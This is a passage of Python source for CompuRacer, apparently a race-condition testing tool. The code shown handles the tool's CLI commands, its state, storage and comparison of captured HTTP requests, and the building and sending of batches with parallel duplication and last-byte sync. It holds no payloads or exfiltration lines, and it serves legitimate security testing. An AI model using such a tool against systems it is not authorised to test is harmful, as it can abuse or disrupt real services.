time.sleep(0.5)
@staticmethod
def get_default_state():
"""
Gets the default state dictionary
:return: the dict
"""
return {
"display_welcome": True,
"colored_output": False,
"current_batch": None,
"project_name": "",
"batches": {},
"requests": {},
"concepts": None,
"immediate_mode": "off",
"immediate_print": True,
"immediate_settings": [1, 1, False, False, 20],
"cp_history": [],
"changed": True
}
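# Note: 'immediate_settings' is ordered as [parallel_dup, sequential_dup,
# allow_redirects, sync_last_byte, send_timeout]; see comm_mode_set_settings.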
@staticmethod
def create_new_state(colored_output, the_requests=None, project_name="", batches=None, concepts=None, current_batch=None):
"""
Gets the a new state dictionary
:param colored_output: if True, to colors the output
:param the_requests: the dict of requests
:param project_name: the default project name prefix
:param batches: the dict of batches
:param concepts: not used
:param current_batch: the current batch name
:return: the dict
"""
if not the_requests:
the_requests = {}
if not batches:
batches = {}
return {
"display_welcome": True,
"colored_output": colored_output,
"current_batch": current_batch,
"project_name": project_name,
"batches": batches,
"requests": the_requests,
"concepts": concepts,
"immediate_mode": "off",
"immediate_print": True,
"immediate_settings": [1, 1, False, False, 20],
"cp_history": [],
"changed": True
}
@staticmethod
def display_welcome(self):
"""
Displays the welcome string when the application is started
:param self: reference to the CompuRacer
"""
print()
self.print_formatted("CompuRacer v{} started".format(self.CLIENT_VERSION), utils.QType.GREEN)
@staticmethod
def run_rest_server_interfacer(racer, rest_server_queue):
"""
The method that is used in communicating with the REST server
:param racer: a reference to the CompuRacer
:param rest_server_queue: the queue where the REST server sends received requests through
"""
# listen for requests to the REST server and send them to the racer
# it also triggers immediate batch sending if necessary
bunch_start_time = time.time()
immediate_batch_unsent = False
max_diff = 2
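# Every incoming request restarts the timer; once nothing has arrived for
# max_diff seconds, the accumulated immediate batch is sent in one go.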
while not racer.shutdown_client:
try:
new_item = rest_server_queue.get(timeout=max_diff)
if new_item['type'] == 'request':
new_request = new_item['content']
bunch_start_time = time.time() # restart wait time
immediate_batch_unsent = True
racer.add_request_from_json(new_request)
elif new_item['type'] == 'mode':
racer.comm_mode_change(racer, new_item['content'], False)
elif new_item['type'] == 'settings':
racer.comm_mode_set_settings(racer, new_item['content'][0], new_item['content'][1],
new_item['content'][2], new_item['content'][3],
new_item['content'][4], False)
except queue.Empty:
pass
except Exception as e:
print(e)
if immediate_batch_unsent and time.time() - bunch_start_time > max_diff:
racer.trigger_immediate()
immediate_batch_unsent = False
# -------------- Command loading for processor -------------- #
def add_all_commands(self):
"""
Adds all command types to the command processor
"""
self.add_commands_general()
self.add_commands_mode()
self.add_commands_requests()
self.add_commands_batches()
self.add_commands_current_batch()
def add_commands_general(self):
"""
Adds all commands that are related to the general workings of the application
"""
self.command_processor.add_command(["wel"], self.comm_general_change_welcome,
"Enables or disables the welcome screen on startup.\n"
"Note: Enables when no arguments are provided", self,
arg_spec_opt=[("Enable welcome", bool, True)]
)
self.command_processor.add_command(["col"], self.comm_general_change_color_output,
"Enables or disables the colored output (disable this if you see odd characters).\n"
"Note: Enables when no arguments are provided", self,
arg_spec_opt=[("Enable color", bool, True)]
)
self.command_processor.add_command(["s", "save"], self.comm_general_save, "Saves the current state.", self)
self.command_processor.add_command(["q", "quit"], self.comm_general_shutdown, "Saves the current state and shuts down the racer.", self)
def add_commands_mode(self):
"""
Adds all commands that are related to the immediate mode of the application
"""
self.command_processor.add_command(["mode"], self.comm_mode_change,
"Sets the mode to add incoming requests to: the current batch, a new batch (and send it after 2 secs) or not at all.", self,
arg_spec_opt=[("Change immediate mode: 'off', 'curr' or 'on'", str, "* on: new batch and send mode *")]
)
self.command_processor.add_command(["set mode"], self.comm_mode_set_settings,
"Updates mode settings for parallel and sequential duplication.", self,
arg_spec_opt=[("Parallel duplicates > 0", int, 1),
("Sequential duplicates > 0", int, 1),
("Allow redirects", bool, False),
("Sync last byte", bool, True),
("Send timeout >= 1", int, True)]
)
self.command_processor.add_command(["print mode"], self.comm_mode_change_printing,
"Enables or disables immediate-mode results printing.\n"
"Note: Enables when no arguments are provided", self,
arg_spec_opt=[("Enable immediate mode printing", bool, True)]
)
def add_commands_requests(self):
"""
Adds all commands that are related to viewing, comparing and removing requests
"""
self.command_processor.add_command(["reqs"], self.comm_requests_get,
"Gets a sorted table of basic request info.", self,
arg_spec_opt=[("First request ID", str, "* all requests *"),
("Last request ID", str, "* only first request *"),
(f"Sort order {[str(order) for order in SortOrder]}", SortOrder,
"SortOrder.INDEX"), ("Sort in ascending order", bool, True)]
)
self.command_processor.add_command(["req"], self.comm_requests_get_one,
"Gets a specific request by ID. Getting newest request when no argments are provided.", self,
arg_spec_opt=[("Request ID", str, "* the most recently added request *")]
)
self.command_processor.add_command(["comp reqs"], self.comm_requests_comp,
"Compares the contents of two requests.", self,
arg_spec=[("First request ID", str), ("Second request ID", str)],
arg_spec_opt=[("Also print matches of comparison", bool, False)]
)
self.command_processor.add_command(["rm reqs"], self.comm_requests_remove,
"Deletes the request(s) by ID from the general list.", self,
arg_spec_opt=[("First request ID", str, "* all requests *"),
("Last request ID", str, "* only first request *")]
)
self.command_processor.add_command(["lower reqs"], self.comm_requests_lower_ids,
"Re-creates the ids of all requests so that it is a sequencial list starting at 1.\n"
"Note: Also updates the ids in all batches. Could take some time", self)
def add_commands_batches(self):
"""
Adds all commands that are related to creating, viewing, updating, copying, comparing importing/exporting
and removing of batches
"""
self.command_processor.add_command(["go"], self.comm_batches_send,
"Sends a batch by index according to its configuration.", self,
arg_spec_opt=[("Index of the batch", int, "* the current batch *"),
("Print result summary", bool, True)]
)
self.command_processor.add_command(["add bs", "add batch"], self.comm_batches_create_new,
"Creates a new batch by name and sets it as current batch (must be unique)", self,
arg_spec=[("Name of the batch", str)],
arg_spec_opt=[("If true, set new batch as current batch, else it keeps the current value", bool, True)]
)
self.command_processor.add_command(["get proj", "get project"], self.comm_batches_get_project,
"Gets the project name prefix with which all new batch names will begin.", self
)
self.command_processor.add_command(["set proj", "set project"], self.comm_batches_set_project,
"Sets the project name prefix with which all new batch names will now begin: 'project_name'_<batch_name>", self,
arg_spec_opt=[("Name of the project", str, "* Empty string *")]
)
self.command_processor.add_command(["bss", "ls", "dir", "batches"], self.comm_batches_info,
"Gets a table of info of all batches", self)
self.command_processor.add_command(["set curr"], self.comm_batches_set_current,
"Sets the current batch by index", self,
arg_spec=[("Index of the batch", int)]
)
self.command_processor.add_command(["get cont"], self.comm_batches_get_contents,
"Get batch by index and print batch contents summary", self,
arg_spec=[("Index of the batch", int)],
arg_spec_opt=[("If true, get full batch contents (including ASCII timing-representation) else get summary", bool, False)]
)
self.command_processor.add_command(["get res"], self.comm_batches_get_results,
"Get batch by index and print last results summary", self,
arg_spec=[("Index of the batch", int)],
arg_spec_opt=[("If true, get aggregate tables", bool, False),
("If true, get groups contents", bool, False)]
)
self.command_processor.add_command(["comp res"], self.comm_batches_comp_resp_groups,
"Compares two response groups within the request result in a batch", self,
arg_spec=[("Index of the batch", int),
("First group number (0 <= number < num_groups)", int),
("Second group number", int)],
arg_spec_opt=[("Request ID", str, "* last request in batch (alphabetical) *")]
)
self.command_processor.add_command(["rn bs", "rn batch"], self.comm_batches_rename,
"Rename the batch to the new name. If old name not provided, it will rename the current batch", self,
arg_spec=[("New name of the batch", str)],
arg_spec_opt=[("Index of the batch", int, "* the current batch *")]
)
self.command_processor.add_command(["cp bs", "cp batch"], self.comm_batches_copy,
"Copy the batch and give it a new name. If name not provided, it will copy the current batch", self,
arg_spec=[("Name of the new batch", str)],
arg_spec_opt=[("Index of the batch", int, "* the current batch *")]
)
self.command_processor.add_command(["rm bss", "rm batches"], self.comm_batches_remove,
"Remove the batch(es) including the used requests and results", self,
arg_spec_opt=[("Index of the first batch", int, "* the current batch *"),
("Index of the last batch", int, "* only the first batch *")]
)
self.command_processor.add_command(["exp bss", "exp batches"], self.comm_batches_export,
"Export the batch(es) including the used requests and results", self,
arg_spec_opt=[("Index of the first batch", int, "* the current batch *"),
("Index of the last batch", int, "* only the first batch *")]
)
self.command_processor.add_command(["imp bss ls", "imp batches list"], self.comm_batches_import_list,
"Lists the batches (with indices) that can be imported.", self
)
self.command_processor.add_command(["imp bss", "imp batches"], self.comm_batches_import,
"Import a previously exported batch by number or using a file picker (if no arguments).\n"
"If the system does not support showing a dialog, it will show an error message"
"Duplicates will be renamed.", self,
arg_spec_opt=[("Index of the first batch", int, "* opens file picker dialog *"),
("Index of the last batch", int, "* only the first batch *")]
)
self.command_processor.add_command(["reg bss", "regroup batches"], self.comm_batches_regroup,
"For all batches, force regroup the results. Useful when grouping code is updated.\n"
"Note: Takes some time.", self)
def add_commands_current_batch(self):
"""
Adds all commands that are related to changing, viewing, comparing and removing the current batch
"""
self.command_processor.add_command(["red", "redir"], self.comm_curr_change_redirects,
"Enables or disables whether the current batch allows redirects.\n"
"Enables when no arguments are provided", self,
arg_spec_opt=[("Enable redirects", bool, True)]
)
self.command_processor.add_command(["sync"], self.comm_curr_change_sync,
"Enables or disables whether the current batch syncs the last byte of the request content (if any).\n"
"Enables when no arguments are provided", self,
arg_spec_opt=[("Enable last byte sync", bool, True)]
)
self.command_processor.add_command(["timeout"], self.comm_curr_change_timeout,
"Sets the current batch send timout (default 20 seconds).", self,
arg_spec_opt=[("send timeout >= 1", int, 20)]
)
self.command_processor.add_command(["add"], self.comm_curr_add,
"Adds a request to the current batch by ID, wait_time, parallel and sequential duplicates", self,
arg_spec=[("Request ID", str)],
arg_spec_opt=[("Wait time >= 0", int, 0),
("Parallel duplicates > 0", int, 1),
("Sequential duplicates > 0", int, 1)]
)
self.command_processor.add_command(["upd", "update"], self.comm_curr_update,
"Updates the wait_time, parallel and/or sequential duplication of the request in the current batch.", self,
arg_spec=[("Request ID", str), ("Wait time >= 0", int, 0)],
arg_spec_opt=[("Parallel duplicates > 0", int, 1),
("Sequential duplicates > 0", int, 1)]
)
self.command_processor.add_command(["get ign", "get ignore"], self.comm_curr_get_ignore,
"Gets the ignore fields in grouping of the current batch", self)
self.command_processor.add_command(["add ign", "add ignore"], self.comm_curr_add_ignore,
"Adds a field to the ignore fields in grouping of the current batch", self,
arg_spec=[("Field name (case sensitive)", str)]
)
self.command_processor.add_command(["res ign", "reset ignore"], self.comm_curr_reset_ignore,
"Reset the ignore fields in grouping of the current batch to the default values", self)
self.command_processor.add_command(["cont"], self.comm_curr_get_contents,
"Print current batch contents summary", self,
arg_spec_opt=[("If true, get full batch contents (including ASCII timing-representation) else get summary", bool, False)]
)
self.command_processor.add_command(["res"], self.comm_curr_get_results,
"Print current batch last results", self,
arg_spec_opt=[("If true, get aggregate tables", bool, False),
("If true, get groups contents", bool, False)]
)
self.command_processor.add_command(["comp"], self.comm_curr_compare_groups,
"Compares two response groups within the request result in current batch", self,
arg_spec=[("First group number (0 <= number < num_groups)", int),
("Second group number", int)],
arg_spec_opt=[("Request ID", str, "* last request in batch (alphabetical) *")]
)
self.command_processor.add_command(["rm"], self.comm_curr_remove,
"Removes (a) request(s) from the current batch by ID and wait_time", self,
arg_spec_opt=[("Request ID", str, "* all IDs *"),
("Wait time >= 0", int, "* all wait times *")]
)
# ----------------------------------------------------------------------------------------------------- #
# ------------------------------------- General command functions ------------------------------------- #
# ----------------------------------------------------------------------------------------------------- #
@staticmethod
def comm_general_change_welcome(self, do_display=True):
"""
Changes whether the welcome string is displayed when the application is started
:param self: reference to the CompuRacer
:param do_display: if True, it displays the welcome string
"""
self.__change_state('display_welcome', do_display)
self.print_formatted("Welcome display -enabled is set to: '{}'".format(self.state["display_welcome"]),
utils.QType.INFORMATION)
@staticmethod
def comm_general_change_color_output(self, do_colored_output=True):
"""
Changes whether colored output is used in the command line interface
:param self: reference to the CompuRacer
:param do_colored_output: if True, it uses the colored output
"""
self.__change_state('colored_output', do_colored_output)
self.print_formatted("Colored output -enabled is set to: '{}'".format(self.state["colored_output"]),
utils.QType.INFORMATION)
@staticmethod
def comm_mode_change(self, immediate_mode='off', from_ui=True):
"""
Changes the mode of the CompuRacer when receiving a new request via the REST server
:param self: reference to the CompuRacer
:param immediate_mode: If 'on', it creates a new batch with this request and sends it. If 'curr', it adds the request to the current batch. If 'off', it does nothing
:param from_ui: If the request is from the REST server, do not add this update to the REST server queue.
"""
immediate_mode = immediate_mode.lower()
if immediate_mode not in ['on', 'off', 'curr']:
# invalid mode selected
self.print_formatted(f"Invalid immediate mode selected: '{immediate_mode}'!"
f"\n\tValue must be 'on', 'off' or 'curr'.",
utils.QType.ERROR, not from_ui)
return -1
if self.state['immediate_mode'] == immediate_mode:
# nothing changed
self.print_formatted(f"Immediate-mode not changed, it is still: '{immediate_mode}'",
utils.QType.WARNING, not from_ui)
return
# warn user if an immediate batch is still being created (and not yet send)
if self.state['immediate_mode'] == 'on' and \
self.immediate_batch_name in self.state['batches'] and \
not self.state['batches'][self.immediate_batch_name].has_results():
if from_ui:
if not self.command_processor.accept_yes_no(
"Are you sure you want to change the immediate mode while the immediate batch is not yet sent?",
utils.QType.WARNING):
self.print_formatted("Immediate-mode change is cancelled.", utils.QType.INFORMATION, not from_ui)
return
else:
self.print_formatted("Immediate-mode change is cancelled.", utils.QType.INFORMATION, not from_ui)
return
self.__change_state('immediate_mode', immediate_mode)
if from_ui:
self.server_send_queue.put({'type': 'mode', 'content': immediate_mode})
self.print_formatted(f"Immediate-mode is set to: '{self.state['immediate_mode']}'",
utils.QType.INFORMATION, not from_ui)
@staticmethod
def comm_mode_set_settings(self, parallel_dup=1, sequential_dup=1, allow_redirects=False, sync_last_byte=True, send_timeout=20, from_ui=True):
"""
When the mode is 'on' or 'curr', it will add requests with these settings to a batch
:param self: reference to the CompuRacer
:param parallel_dup: the parallel duplication amount
:param sequential_dup: the sequential duplication amount
:param allow_redirects: if True, redirects are followed when sending
:param sync_last_byte: if True, the last byte of each request is synchronized before sending
:param send_timeout: the send timeout in seconds (>= 1)
:param from_ui: if True, the change is also forwarded to the REST server queue
:return: 0 on success and -1 on error
"""
if parallel_dup <= 0:
self.print_formatted(f"Immediate-mode parallel_dup must be positive, but is: {parallel_dup}", utils.QType.ERROR)
return -1
if sequential_dup <= 0:
self.print_formatted(f"Immediate-mode sequential_dup must be positive, but is: {sequential_dup}", utils.QType.ERROR)
return -1
if send_timeout < 1:
self.print_formatted(f"Immediate-mode send_timeout must be >= 1, but is: {send_timeout}", utils.QType.ERROR)
return -1
self.__change_state('immediate_settings', [parallel_dup, sequential_dup, allow_redirects, sync_last_byte, send_timeout])
if from_ui:
self.server_send_queue.put({'type': 'settings', 'content': [parallel_dup, sequential_dup, allow_redirects, sync_last_byte, send_timeout]})
self.print_formatted(f"Immediate-mode settings are set to: '{self.state['immediate_settings']}'",
utils.QType.INFORMATION, not from_ui)
@staticmethod
def comm_mode_change_printing(self, immediate_print=True):
"""
Changes whether sending in mode 'on' prints the results on the command line
:param self: reference to the CompuRacer
:param immediate_print: if True, it will print
"""
self.__change_state('immediate_print', immediate_print)
self.print_formatted("Immediate-mode result printing is set to: '{}'".format(self.state["immediate_print"]),
utils.QType.INFORMATION)
# ----------------------------------------------------------------------------------------------------- #
# ------------------------------------- Request command functions ------------------------------------- #
# ----------------------------------------------------------------------------------------------------- #
@staticmethod # internal usage
def comm_requests_get_one(self, request_id=None):
with self.requests_list_lock:
if not request_id:
if not self.state['requests']:
self.print_formatted(f"Cannot get newest request: The total request list is empty!",
utils.QType.ERROR)
return -1
request_id = str(sorted([int(key) for key in self.state['requests'].keys()])[-1])
if request_id not in self.state['requests']:
self.print_formatted(f"Cannot get request: The request with id '{request_id}' is not in the total request list!",
utils.QType.ERROR)
return -1
the_request = copy.deepcopy(self.state['requests'][request_id])
# format the body if it is form key-value data
try:
the_request = self.format_request_form_body(the_request)
except ValueError as e:
self.print_formatted(f"Request body is invalid!\n\t{e}", utils.QType.WARNING)
self.print_formatted(f"Request '{request_id}':", utils.QType.INFORMATION)
self.print_formatted(utils.tabbed_pprint_request(the_request, 1), utils.QType.NONE)
@staticmethod # internal usage
def comm_requests_get(self, request_id_first=None, request_id_last=None, sort_order=SortOrder.INDEX.value, sort_ascending=True):
with self.requests_list_lock:
reqs_used = {}
message = ""
if request_id_first is None:
# return all requests
reqs_used = self.state['requests']
message = "All stored requests:"
elif request_id_last is None:
# return only one request
if request_id_first not in self.state['requests']:
self.print_formatted(
f"Cannot get request: The request with id '{request_id_first}' is not in the total request list!",
utils.QType.ERROR)
return -1
reqs_used[request_id_first] = self.state['requests'][request_id_first]
message = "The matching request:"
else:
# return a range of requests (missing items are skipped)
for i, request_id in enumerate(self.state['requests'].keys()):
if request_id_first <= request_id <= request_id_last:
reqs_used[request_id] = self.state['requests'][request_id]
message = "The matching request(s):"
req_list = utils.sort_requests(reqs_used, sort_order, sort_ascending)
self.print_formatted(message, utils.QType.INFORMATION)
self.print_formatted(f"{utils.print_request_table(req_list)}\nTotal number: {len(reqs_used.keys())}", utils.QType.NONE)
@staticmethod # internal usage
def comm_requests_comp(self, request_id_1, request_id_2, print_matches=False):
if request_id_1 not in self.state['requests']:
self.print_formatted(
f"Cannot compare first request: The request with id '{request_id_1}' is not in the total request list!",
utils.QType.ERROR)
return -1
if request_id_2 not in self.state['requests']:
self.print_formatted(
f"Cannot compare second request: The request with id '{request_id_2}' is not in the total request list!",
utils.QType.ERROR)
return -1
requests = copy.deepcopy([self.state['requests'][request_id_1], self.state['requests'][request_id_2]])
# format the body if it is form key-value data
try:
requests = [self.format_request_form_body(requests[0]),
self.format_request_form_body(requests[1])]
except ValueError as e:
self.print_formatted(f"Either of the request bodies is invalid!\n\t{e}", utils.QType.WARNING)
return
comp = utils.compare_requests(requests[0], requests[1], None, False)
if not print_matches:
comp.pop('match', None)
comp = utils.perform_string_compare_on_results(comp, 25)
self.print_formatted(
f"Comparison of requests with id '{request_id_1}' and '{request_id_2}':",
utils.QType.INFORMATION)
self.colorprint_comp_results(self, comp)
@staticmethod # do not add requests to this list in any other way
def comm_requests_remove(self, request_id_first=None, request_id_last=None, ask_confirmation=True):
with self.requests_list_lock:
if not self.state['requests']:
self.print_formatted(f"There is no request to delete: The total request list is empty!",
utils.QType.ERROR)
return -1
failed_requests = []
success_requests = []
if request_id_first is None:
# remove all requests
if not ask_confirmation or self.command_processor.accept_yes_no("Are you sure you want to remove all requests?",
utils.QType.WARNING):
for i, request_id in enumerate(copy.deepcopy(list(self.state['requests'].keys()))):
if self.rem_request(self, request_id, False) == -1:
failed_requests.append(request_id)
else:
success_requests.append(request_id)
else:
self.print_formatted(f"Removal of all requests cancelled.", utils.QType.INFORMATION)
return
elif request_id_last is not None:
# remove a range of requests
if not ask_confirmation or self.command_processor.accept_yes_no(
f"Are you sure you want to remove requests with id between and including {request_id_first} and {request_id_last}?",
utils.QType.WARNING):
for i, request_id in enumerate(copy.deepcopy(list(self.state['requests'].keys()))):
if request_id_first <= request_id <= request_id_last:
if self.rem_request(self, request_id, False) == -1:
failed_requests.append(request_id)
else:
success_requests.append(request_id)
else:
self.print_formatted(f"Removal of range of requests cancelled.", utils.QType.INFORMATION)
return
else:
# remove one request
if self.rem_request(self, request_id_first, True) == -1:
failed_requests.append(request_id_first)
else:
success_requests.append(request_id_first)
if success_requests:
self.print_formatted(f"Removal of {len(success_requests)} request(s) successful.", utils.QType.INFORMATION)
if failed_requests:
self.print_formatted(f"Removal of the following request(s) failed:\n\t{failed_requests} ",
utils.QType.WARNING)
@staticmethod
def comm_requests_lower_ids(self):
if not self.command_processor.accept_yes_no("Are you sure you want to lower and make sequential all request ids?\n\tThis can take some time.",
utils.QType.WARNING):
self.print_formatted(f"Lowering of request ids is cancelled.", utils.QType.INFORMATION)
return
if not self.state['requests']:
# nothing to do
self.print_formatted(f"Nothing is changed: The total request list is empty.", utils.QType.WARNING)
return
if int(sorted([int(key) for key in self.state['requests'].keys()])[-1]) + 1 == len(self.state['requests'].keys()):
self.print_formatted(f"Nothing is changed: The request ids are already as low as they can be.",
utils.QType.INFORMATION)
return
# remove all requests
requests = self.state['requests']
self.state['requests'] = dict()
# re-add them one by one and save the old-new id mapping
updated_ids = {}
for req_id, req in tqdm(requests.items(), desc="Adding requests", ncols=self.progress_bar_width):
# remove the old id and fetch new
old_id = req_id
del req['id']
_, new_id = self.add_request(self, req, used_from_interface=True, print_information=False)
# the update key-method assumes the add_request method avoids collisions
if old_id != new_id:
updated_ids[old_id] = new_id
if not updated_ids:
self.print_formatted(f"Nothing is changed: The request ids are already as low as they can be.", utils.QType.INFORMATION)
return
# update renewed ids in batches
for batch in self.state['batches'].values():
batch.update_ids(updated_ids)
self.print_formatted(f"Successfully lowered all request ids.", utils.QType.INFORMATION)
# ------------------------------------- Request command helpers ------------------------------------- #
@staticmethod # internal usage
def get_specific_requests(self, request_ids, sort_order=SortOrder.INDEX.value, sort_ascending=True, get_str=False):
with self.requests_list_lock:
reqs_used = {}
# return a range of requests (missing items are skipped)
for request_id in request_ids:
if request_id not in self.state['requests']:
self.print_formatted(
f"Cannot get request: The request with id '{request_id}' is not in the total request list!",
utils.QType.WARNING)
else:
reqs_used[request_id] = self.state['requests'][request_id]
req_list = utils.sort_requests(reqs_used, sort_order, sort_ascending)
if get_str:
ret_str = "The matching request(s):\n"
ret_str += f"{utils.print_request_table(req_list)}\nTotal number: {len(self.state['requests'].keys())}"
return ret_str
else:
self.print_formatted("The matching request(s):", utils.QType.INFORMATION)
self.print_formatted(f"{utils.print_request_table(req_list)}\nTotal number: {len(self.state['requests'].keys())}", utils.QType.NONE)
@staticmethod
def add_request(self, a_request, used_from_interface=False, print_information=True):
# requires a lock as both the UI and the REST server can add requests in parallel
# will not create an immediate batch from requests that came from the interface (or imports)
with self.requests_list_lock:
# add a body if there is none
if 'body' not in a_request:
a_request['body'] = ""
# check if the request is unique - O(n)
duplicate_id = None
for req in self.state['requests'].values():
diff = utils.compare_requests(req, a_request)
if not diff['fail']['total']:
if print_information:
self.print_formatted(
f"New request is not added, it already exists: \n{utils.tabbed_string(utils.print_request_table([req]),1)}",
utils.QType.WARNING, not used_from_interface)
duplicate_id = req['id']
break
if duplicate_id is None:
# yay! it is new, create a new req_id
req_id = str(max([int(req_id) for req_id in self.state['requests']] + [-1]) + 1)
a_request['id'] = req_id
# add to requests
self.__change_state('requests', a_request, req_id)
if print_information:
try:
a_request = self.format_request_form_body(a_request)
except ValueError as e:
self.print_formatted(f"Request body is invalid!\n\t{e}", utils.QType.WARNING)
if used_from_interface:
self.print_formatted(
f"Added new request:\n{utils.tabbed_pprint_request(a_request, 1)}\nTotal number: {len(self.state['requests'].keys())}",
utils.QType.INFORMATION, not used_from_interface)
else:
self.print_formatted(
f"Added new request:\n{utils.tabbed_string(utils.print_request_table([a_request]),1)}\nTotal number: {len(self.state['requests'].keys())}",
utils.QType.INFORMATION, not used_from_interface)
else:
req_id = duplicate_id
# perform mode-specific actions with new or duplicate request
if not used_from_interface and self.state['immediate_mode'] != "off":
# note that the last two settings are only used in immediate mode
par, seq, allow_redirects, sync_last_byte, send_timeout = self.state['immediate_settings']
if self.state['immediate_mode'] == "curr":
# add to current batch
if not self.state['current_batch']:
self.print_formatted(f"Cannot add a request to current batch: there is no current batch",
utils.QType.ERROR,
not used_from_interface)
return -1, req_id
current_batch = self.state['batches'][self.state['current_batch']]
try:
current_batch.add(req_id, 0, par, seq, False)
except Exception as e:
self.print_formatted(f"Cannot add a request to current batch:\n\t{e}", utils.QType.ERROR,
not used_from_interface)
return -1, req_id
else:
self.print_formatted(f"Request {req_id} added to current batch.", utils.QType.INFORMATION)
else:
# add to immediate batch
if self.immediate_batch_name in self.state['batches']:
if self.state['batches'][self.immediate_batch_name].has_results():
# already sent, can be overwritten
self.rem_batch_by_name(self, self.immediate_batch_name, True)
if self.immediate_batch_name not in self.state['batches']:
# create new immediate batch
self.comm_batches_create_new(self, self.immediate_batch_name, False, not used_from_interface,
allow_redirects, sync_last_byte, send_timeout)
immediate_batch = self.state['batches'][self.immediate_batch_name]
try:
immediate_batch.add(req_id, 0, par, seq, False)
except Exception as e:
# this should not be possible
self.print_formatted(f"Cannot add a request to immediate batch:\n\t{e}", utils.QType.ERROR,
not used_from_interface)
return -1, req_id
else:
self.print_formatted(f"Request {req_id} added to immediate batch.", utils.QType.INFORMATION)
return None, req_id
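    # pretty-prints a nested comparison result dict; lines starting with '-' are shown in red and lines starting with '+' in green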
@staticmethod
def colorprint_comp_results(self, results):
string = ""
for key in results.keys():
string += f"\n{key}: {{\n"
for sub_key in results[key]:
string += f"\t{sub_key}: {{\n"
for sub_sub_key in results[key][sub_key]:
string += f"\t\t{sub_sub_key}: {{\n"
if type(results[key][sub_key][sub_sub_key]) is list:
string += utils.tabbed_string(str(results[key][sub_key][sub_sub_key]), 3) + "\n"
else:
string += utils.tabbed_string(str(results[key][sub_key][sub_sub_key]), 1) + "\n"
string += "\t\t}\n"
string += "\t}\n"
string += "}\n"
self.print_formatted_multi(
utils.tabbed_string(string, 1),
utils.QType.NONE,
{re.compile(r"^\t*-"): utils.QType.RED, re.compile(r"^\t*\+"): utils.QType.GREEN})
# Note: only to be used internally with a valid request-id!
@staticmethod
def request_used_in(self, request_id):
used_in = []
for batch_name in self.state['batches']:
if self.state['batches'][batch_name].get(request_id):
used_in.append(batch_name)
return used_in
    @staticmethod  # do not remove requests from this list in any other way
def rem_request(self, request_id, ask_confirmation=False):
with self.requests_list_lock:
if request_id not in self.state['requests']:
self.print_formatted(f"Cannot remove request:\n\t"
f"The request with id '{request_id}' is not in the total request list!",
utils.QType.ERROR)
return -1
used_in = self.request_used_in(self, request_id)
if used_in:
if self.immediate_batch_name in used_in:
self.print_formatted(f"Not allowed to remove request:\n\t"
f"The request with id '{request_id}' is (also) used by the immediate batch!",
utils.QType.ERROR)
return -1
if not ask_confirmation:
self.print_formatted(f"The request with id '{request_id}' is used by batches: "
f"{used_in}. It must be removed individually.",
utils.QType.ERROR)
return -1
# remove request from the batches
if not self.command_processor.accept_yes_no(f"The request with id '{request_id}' is used by batches: "
f"{used_in}, continue?\n\tIt will be removed from these batches and their results are cleared!!",
utils.QType.WARNING):
return -1
# remove request from the batches
for batch_name in used_in:
self.state['batches'][batch_name].remove(request_id)
ask_confirmation = False
if not ask_confirmation or self.command_processor.accept_yes_no(f"Are you sure you want to remove the request with id '{request_id}'?",
utils.QType.WARNING):
self.__change_state('requests', sub_search=request_id, do_delete=True)
self.print_formatted(f"Request with id '{request_id}' is removed", utils.QType.INFORMATION)
else:
self.print_formatted(f"Removal of request cancelled.", utils.QType.INFORMATION)
# --------------------------------------------------------------------------------------------------- #
# ------------------------------------- Batch command functions ------------------------------------- #
# --------------------------------------------------------------------------------------------------- #
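    # colors batch result lines by HTTP status code class: 1xx/2xx green, 3xx yellow, 4xx red, 5xx blue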
@staticmethod
def get_batch_result_formatting():
return {re.compile(r".*?\t\s{10}[12]\d\d\s\s.*?"): utils.QType.GREEN,
re.compile(r".*?\t\s{10}[3]\d\d\s\s.*?"): utils.QType.YELLOW,
re.compile(r".*?\t\s{10}[4]\d\d\s\s.*?"): utils.QType.RED,
re.compile(r".*?\t\s{10}[5]\d\d\s\s.*?"): utils.QType.BLUE,
re.compile(r"'status_code': [12].."): utils.QType.GREEN,
re.compile(r"'status_code': 3.."): utils.QType.YELLOW,
re.compile(r"'status_code': 4.."): utils.QType.RED,
re.compile(r"'status_code': 5.."): utils.QType.BLUE}
@staticmethod
def comm_batches_send(self, index=None, print_results=True, immediate_allowed=False):
name = self.batch_index_to_name(self, index)
if name == -1:
return -1
if not immediate_allowed and name == self.immediate_batch_name:
self.print_formatted(f"Not allowed to send immediate batch from interface!", utils.QType.ERROR)
return -1
batch = self.state['batches'][name]
if batch.is_empty():
self.print_formatted(f"Cannot send the batch: The batch is empty!", utils.QType.ERROR)
return -1
self.print_formatted(f"Sending the batch with name '{name}'..", utils.QType.INFORMATION)
if batch.has_results() and not self.command_processor.accept_yes_no("Batch already has results, overwrite?", utils.QType.WARNING):
self.print_formatted(f"Batch sending cancelled.", utils.QType.INFORMATION)
return -1
batch.overwrite_results(sender.send_batch(batch, self.state['requests'], self.proxy))
self.print_formatted("The batch is sent.", utils.QType.INFORMATION)
if print_results:
res_summary = batch.get_last_results(True, False)
res_full = batch.get_last_results(True, True)
res_config = self.comm_batches_get_contents(self, 0, False, True)
if immediate_allowed:
self.server_send_queue.put({'type': 'results', 'content': [res_summary, res_full, res_config]})
self.print_formatted_multi(f"Results:\n{res_full}",
default_type=utils.QType.NONE,
special_types=self.get_batch_result_formatting()
)
@staticmethod
def comm_batches_info(self):
self.print_formatted(f"Table of batches info:", utils.QType.INFORMATION)
dicts = [batch.get_mini_summary_dict() for batch in self.state['batches'].values()]
if dicts:
contents = [[item['name'], item['items'], item['requests'],
item['has_results'], item['is_synced'], item['is_redir']] for item in
sorted(dicts, key=lambda x: x['name'])]
else:
contents = []
col_names = Batch.get_mini_summary_header()
output = tabulate(contents, col_names, showindex="always", tablefmt="simple") + "\n"
if self.state['current_batch']:
self.print_formatted_multi(output, utils.QType.NONE, {f" {re.escape(self.state['current_batch'])} ": utils.QType.BLUE})
else:
self.print_formatted(output, utils.QType.NONE)
@staticmethod
def comm_batches_set_current(self, index, immediate_allowed=False):
name = self.batch_index_to_name(self, index)
if name == -1:
return -1
return self.set_curr_batch_by_name(self, name, immediate_allowed)
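    # prepends the current project name prefix (if any) to the given batch name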
@staticmethod
def add_prefix(self, name):
if name is None or 'project_name' not in self.state or self.state['project_name'] == "":
return name
else:
return self.state['project_name'] + name
@staticmethod
def comm_batches_create_new(self, name, set_current_batch=True, immediate_allowed=False,
allow_redirects=False, sync_last_byte=False, send_timeout=20):
if name != self.immediate_batch_name:
name = self.add_prefix(self, name)
if not immediate_allowed and name == self.immediate_batch_name:
self.print_formatted(f"Not allowed to create immediate batch from interface!", utils.QType.ERROR)
return -1
if name in self.state['batches']:
